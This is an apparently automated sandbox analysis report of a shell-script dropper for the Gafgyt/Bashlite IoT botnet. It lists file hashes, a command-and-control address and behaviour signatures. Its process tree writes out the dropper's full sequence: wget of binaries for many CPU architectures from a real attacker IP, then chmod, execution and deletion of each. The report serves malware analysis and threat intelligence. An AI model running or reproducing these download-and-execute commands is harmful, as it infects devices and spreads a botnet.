Analysis

  • max time kernel
    44s
  • max time network
    53s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    28-09-2024 07:55

General

  • Target

    sex.sh

  • Size

    1KB

  • MD5

    884dc57dd0892038d53a2d4b017504df

  • SHA1

    52ab9780591ee9718ce6188a9edafc1afa05dcdf

  • SHA256

    d347e32185478f56ce1c96e1e5dc3ad80ffdcf623036ca6750c60c6183a5c779

  • SHA512

    25e1afb67512005fecdf47712dfc1f0c74ecb221ed0f3904ff47f3ef30948334e31426003f6590c580024f758c7ab8576412a280b5f5ce3f787b6208037db3ca

Malware Config

Extracted

Family

gafgyt

C2

205.185.127.244:23

Signatures

  • Detected Gafgyt variant 11 IoCs
  • Gafgyt/Bashlite

    IoT botnet with numerous variants first seen in 2014.

  • File and Directory Permissions Modification 1 TTPs 13 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 11 IoCs
  • Modifies Watchdog functionality 1 TTPs 6 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Changes its process name 3 IoCs
  • System Network Configuration Discovery 1 TTPs 6 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 11 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/sex.sh
    /tmp/sex.sh
    1⤵
      PID:1493
      • /usr/bin/wget
        wget http://205.185.127.244/mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1494
      • /bin/chmod
        chmod +x mips
        2⤵
        • File and Directory Permissions Modification
        PID:1506
      • /tmp/mips
        ./mips
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:1507
      • /bin/rm
        rm -rf mips
        2⤵
        • System Network Configuration Discovery
        PID:1509
      • /usr/bin/wget
        wget http://205.185.127.244/mipsel
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1510
      • /bin/chmod
        chmod +x mipsel
        2⤵
        • File and Directory Permissions Modification
        PID:1511
      • /tmp/mipsel
        ./mipsel
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:1512
      • /bin/rm
        rm -rf mipsel
        2⤵
        • System Network Configuration Discovery
        PID:1514
      • /usr/bin/wget
        wget http://205.185.127.244/sh4
        2⤵
        • Writes file to tmp directory
        PID:1515
      • /bin/chmod
        chmod +x sh4
        2⤵
        • File and Directory Permissions Modification
        PID:1516
      • /tmp/sh4
        ./sh4
        2⤵
        • Executes dropped EXE
        PID:1517
      • /bin/rm
        rm -rf sh4
        2⤵
          PID:1519
        • /usr/bin/wget
          wget http://205.185.127.244/x86
          2⤵
          • Writes file to tmp directory
          PID:1520
        • /bin/chmod
          chmod +x x86
          2⤵
          • File and Directory Permissions Modification
          PID:1521
        • /tmp/x86
          ./x86
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Changes its process name
          PID:1522
        • /bin/rm
          rm -rf x86
          2⤵
            PID:1525
          • /usr/bin/wget
            wget http://205.185.127.244/arm61
            2⤵
            • Writes file to tmp directory
            PID:1527
          • /bin/chmod
            chmod +x arm61
            2⤵
            • File and Directory Permissions Modification
            PID:1531
          • /tmp/arm61
            ./arm61
            2⤵
            • Executes dropped EXE
            PID:1532
          • /bin/rm
            rm -rf arm61
            2⤵
              PID:1534
            • /usr/bin/wget
              wget http://205.185.127.244/i686
              2⤵
              • Writes file to tmp directory
              PID:1535
            • /bin/chmod
              chmod +x i686
              2⤵
              • File and Directory Permissions Modification
              PID:1536
            • /tmp/i686
              ./i686
              2⤵
              • Executes dropped EXE
              • Modifies Watchdog functionality
              • Changes its process name
              PID:1537
            • /bin/rm
              rm -rf i686
              2⤵
                PID:1540
              • /usr/bin/wget
                wget http://205.185.127.244/ppc
                2⤵
                • Writes file to tmp directory
                PID:1542
              • /bin/chmod
                chmod +x ppc
                2⤵
                • File and Directory Permissions Modification
                PID:1544
              • /tmp/ppc
                ./ppc
                2⤵
                • Executes dropped EXE
                PID:1545
              • /bin/rm
                rm -rf ppc
                2⤵
                  PID:1547
                • /usr/bin/wget
                  wget http://205.185.127.244/586
                  2⤵
                  • Writes file to tmp directory
                  PID:1548
                • /bin/chmod
                  chmod +x 586
                  2⤵
                  • File and Directory Permissions Modification
                  PID:1549
                • /tmp/586
                  ./586
                  2⤵
                  • Executes dropped EXE
                  • Modifies Watchdog functionality
                  • Changes its process name
                  PID:1550
                • /bin/rm
                  rm -rf 586
                  2⤵
                    PID:1553
                  • /usr/bin/wget
                    wget http://205.185.127.244/m68k
                    2⤵
                    • Writes file to tmp directory
                    PID:1555
                  • /bin/chmod
                    chmod +x m68k
                    2⤵
                    • File and Directory Permissions Modification
                    PID:1557
                  • /tmp/m68k
                    ./m68k
                    2⤵
                    • Executes dropped EXE
                    PID:1558
                  • /bin/rm
                    rm -rf m68k
                    2⤵
                      PID:1560
                    • /usr/bin/wget
                      wget http://205.185.127.244/dc
                      2⤵
                        PID:1561
                      • /bin/chmod
                        chmod +x dc
                        2⤵
                        • File and Directory Permissions Modification
                        PID:1562
                      • /tmp/dc
                        ./dc
                        2⤵
                          PID:1563
                        • /bin/rm
                          rm -rf dc
                          2⤵
                            PID:1564
                          • /usr/bin/wget
                            wget http://205.185.127.244/dss
                            2⤵
                            • Writes file to tmp directory
                            PID:1565
                          • /bin/chmod
                            chmod +x dss
                            2⤵
                            • File and Directory Permissions Modification
                            PID:1566
                          • /tmp/dss
                            ./dss
                            2⤵
                            • Executes dropped EXE
                            PID:1567
                          • /bin/rm
                            rm -rf dss
                            2⤵
                              PID:1569
                            • /usr/bin/wget
                              wget http://205.185.127.244/co
                              2⤵
                              • Writes file to tmp directory
                              PID:1570
                            • /bin/chmod
                              chmod +x co
                              2⤵
                              • File and Directory Permissions Modification
                              PID:1571
                            • /tmp/co
                              ./co
                              2⤵
                              • Executes dropped EXE
                              PID:1572
                            • /bin/rm
                              rm -rf co
                              2⤵
                                PID:1574
                              • /usr/bin/wget
                                wget http://205.185.127.244/scar
                                2⤵
                                  PID:1575
                                • /bin/chmod
                                  chmod +x scar
                                  2⤵
                                  • File and Directory Permissions Modification
                                  PID:1576
                                • /tmp/scar
                                  ./scar
                                  2⤵
                                    PID:1577
                                  • /bin/rm
                                    rm -rf scar
                                    2⤵
                                      PID:1578

                                  Network

                                  MITRE ATT&CK Enterprise v15

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • /tmp/586

                                    Filesize

                                    107KB

                                    MD5

                                    878511883ecf938a9b30e0a5eebb1b78

                                    SHA1

                                    6f4192c09680a8cdec1c33fec77e40a96faeee15

                                    SHA256

                                    777ff84d65d53fb8da3f25c4c303cb6f6505ee534e8bdbd936c1f9e60e70a533

                                    SHA512

                                    8ea3f989940b431a6b994374fc322a0eb7933fe6791e947a573ad3e7d26f6a4ee8c72ae4d79e6d23be5f152df4e29934bb7e623a7530ac2752f4c6e3cf0181a4

                                  • /tmp/arm61

                                    Filesize

                                    174KB

                                    MD5

                                    00c59b56e0ef93ffa2eacb7ffc355bc6

                                    SHA1

                                    e9f1a9fa3f2d7e9b8d40129dea37e82746609cea

                                    SHA256

                                    e0fa297f5c991e85f42412776055dda158fb18d7d69ff51e2b5430291f1746c7

                                    SHA512

                                    063a3293125b6981bafe1409bbf2b06ce21496a18496a39a4837f1bdad73e8dfb590118a1eab50e50504ef884a389e516090f485f7381c68f3233d290cdbadcf

                                  • /tmp/co

                                    Filesize

                                    174KB

                                    MD5

                                    8d324a6048da1a123cef9a1465400ece

                                    SHA1

                                    dca6c1f2874c31de3b3b684ef99be2d82450d3bf

                                    SHA256

                                    4cdd14a882e285d404b0da6a70470dfd5553a04352e30a6f7418c689f8f8916a

                                    SHA512

                                    6ba9293bd1d81164d38cd46759aee0ff912b9354c71eb4a639695ed0c0829f4f2a846845647a4c72b295cac8fe2780f107336ea12ba10623df8f1fa4f3ca1f0e

                                  • /tmp/dss

                                    Filesize

                                    135KB

                                    MD5

                                    70445303ca15c2739d0c1d103fc77783

                                    SHA1

                                    97bd19478d17211679b66692a7945ed38c9924e3

                                    SHA256

                                    51bbbe5154ebaf34aceb846a0823dbd88cae1175cd90d6e741b89ad3fe16a5e0

                                    SHA512

                                    a3daa674f970158f76cbb83a10704e880d313d3e2615d486395f0c8339017c2fc1d98084ebe82bd3a6b5e898032e976c4440905c764eb0c048b3983f4b956b77

                                  • /tmp/i686

                                    Filesize

                                    111KB

                                    MD5

                                    9528d0e8ca08dae17e7e19ef7d13e035

                                    SHA1

                                    5d1ff7764e03718af5ebe432c9b8d0d2e1d057ee

                                    SHA256

                                    53c2bfcfa15435d366b80b96946fe5cff049453b086cd255faf0968d55605f1e

                                    SHA512

                                    72d6cd79bf99d095ee7009c3ff6569d7fbc0b950207aac061c4a289f9e89027519e1d7fa25f778a3131c0f57743ccdec5c30d4ebb8eabaa48ed61ceb18c4030e

                                  • /tmp/m68k

                                    Filesize

                                    129KB

                                    MD5

                                    5f4fef5c575e8b3b11d8475dd4de719a

                                    SHA1

                                    273104250032ebdc02e19b05bcf2b5b682e27368

                                    SHA256

                                    b909016b579dfc65db56aac511f68f0ed62ef87b14c4819278ad9dc67cf68338

                                    SHA512

                                    7103b1af22a821297fc1aab82e128936e306059ed055d979e5af418cc8e21ead7f2d28988816b8709be733a36eaccaca0a5d3f0fd17983400cb5e3daeb907e89

                                  • /tmp/mips

                                    Filesize

                                    176KB

                                    MD5

                                    24e07a16008a42f0a8dceb166b4b44cd

                                    SHA1

                                    87f80fc2998304bc8735479faa75f509a6d5db13

                                    SHA256

                                    c4d4bfc3fa6e216baccce64fe187d70519f11aa8ad33573cfdf1c416bbd0ad6f

                                    SHA512

                                    b75a61fc9584e124dbc98556e30166e379dc01ce64312a48906d8e4aed406127aeea1da5f8183e10fe0468908863f7467ac58e71f482c119300836c7c419dab5

                                  • /tmp/mipsel

                                    Filesize

                                    176KB

                                    MD5

                                    ac28a3dfa3ed9b815a8021a362b06607

                                    SHA1

                                    93455b3775f586e230d8879489f9a6062de70677

                                    SHA256

                                    3d9924dddeca5e712bd22e28453437b61eb95c5319e7535737a0bd7a128f30a5

                                    SHA512

                                    94c3aae6a3e945aac0beff504c76f454a5f2b78b88d4cd2364cb0f5608dc25183d37bf0338d4fc2966616e95cbe7ef03f34dfb910dd688ae536d9f5a66f1516e

                                  • /tmp/ppc

                                    Filesize

                                    128KB

                                    MD5

                                    184c7d44649ab256bd5705724bbec6a1

                                    SHA1

                                    baa0a75bd81f5985eb42ad0bdc282405b66af67d

                                    SHA256

                                    3a6f6b23c30602cfd2328e7a6972fcc29423e4ed67a1b854d108b7711992ec58

                                    SHA512

                                    ec1cd34debb06ce5c1571582f26b433ee34c7959fa1d1af0e1e6a0f9834f3d277916e8128d1b73ad569df89e7576b3b9a1a112dd08f10ddee00e30e821ffaa43

                                  • /tmp/sh4

                                    Filesize

                                    123KB

                                    MD5

                                    5ec3c0e18b6fbc6e37bd611e2df8f9a4

                                    SHA1

                                    de10e2b7ce11ffa0bc0fcca82a489a3e6efc160d

                                    SHA256

                                    9b1ca4aa272007f3ae1a80932a690cd1749ab6f8f7980de0f2e5cd326573c4c6

                                    SHA512

                                    76f484543e43cfb33ff449439a64ae08578a7c8142393eed0219f642d7e9401ecf7efe093765be45f1c767d970cc0d280ba53264eb2a6eb7771a7055765e8b20

                                  • /tmp/x86

                                    Filesize

                                    127KB

                                    MD5

                                    678363120cd2661f040670b90f211243

                                    SHA1

                                    57d75e1c42243d08eb78623e6cdc6b066994a7ee

                                    SHA256

                                    cd39c6c637c039bcedc5b906e8c0e602f73c841947b429efc88ec4511d95a36a

                                    SHA512

                                    5a2b440135caa5656deb70f7d6274f8bc570e31c6aac4b6aac8375962db512b885afc6223a9767fc0ff7f29dc5377efa441277cb356dba1e3b5716a57f38ca55